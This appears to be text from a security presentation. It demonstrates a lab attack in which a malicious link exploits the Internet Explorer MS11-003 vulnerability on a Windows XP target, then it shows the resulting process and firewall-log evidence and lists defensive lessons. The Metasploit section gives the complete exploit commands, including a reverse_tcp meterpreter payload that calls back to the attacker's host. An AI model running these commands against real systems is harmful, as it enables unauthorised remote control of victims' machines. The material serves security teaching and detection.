2. Scenario 1 : Topology
Target Firewall Attacker
Gateway
192.168.111.0/24 192.168.178.0/24
Target :
- Windows XP SP3 - User has an admin profile
- IP : 192.168.111.129 - Default gateway : 192.168.111.128
- No anti-virus / Local Windows Firewall activated
- Vulnerable to MS11-03
Firewall Gateway :
- Eth0 : 192.168.111.128 (internal interface)
- Eth1 : 192.168.178.59 (external interface)
Attacker :
- IP : 192.168.178.21
3. Scenario 1 : Firewall rules
• Firewall administration by SSH only from internal network
• Internal network is allowed to request «Any» protocols to external network
4. Scenario 1 : Story-Board
✤ This network topology is corresponding to most of broadband ADSL Internet
connexions for home users, and SMB.
✤ Attacker send a Twitter message to the target. The message contain a malicious URL
(could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability.
✤ The target click on the provided link and MS11-03 is exploited.
✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is
launched.
✤ No further post-exploitations
5. Scenario 1 : Metasploit commands
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set SRVPORT 80
set URIPATH /readme.html
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
ipconfig
route
getuid
6. Scenario 1 : Evidences
Internet Explorer process is created :
A new process has been created:
New Process ID:
3200
Image File Name:
C:Program FilesInternet Exploreriexplore.exe
Creator Process ID:
2224
User Name:
romang
Domain:
ERIC-FD2123B3C5
Logon ID:
(0x0,0x62764)
Internet Explorer process create a new «notepad.exe» process :
A new process has been created:
New Process ID:
3972
Image File Name:
C:WINDOWSsystem32notepad.exe
Creator Process ID:
3200
User Name:
romang
Domain:
ERIC-FD2123B3C5
Logon ID:
(0x0,0x62764)
Logs on the Firewall Gateway
Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00
PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
7. Scenario 1 : Leasons Learned
•Update your OS and applications !
•Don’t run applications with administrator privileges !
•Never click on unknown links, specialy shortened URL’s, from unknown sources !
•Install an antivirus and don’t trust him :)
•Don’t trust your Firewalls (Local or remote) !
•Don’t allow «Any» outbound protocols connexions from your internal network to
untrusted networks ! Limit your outbound connexions to your real needs.
7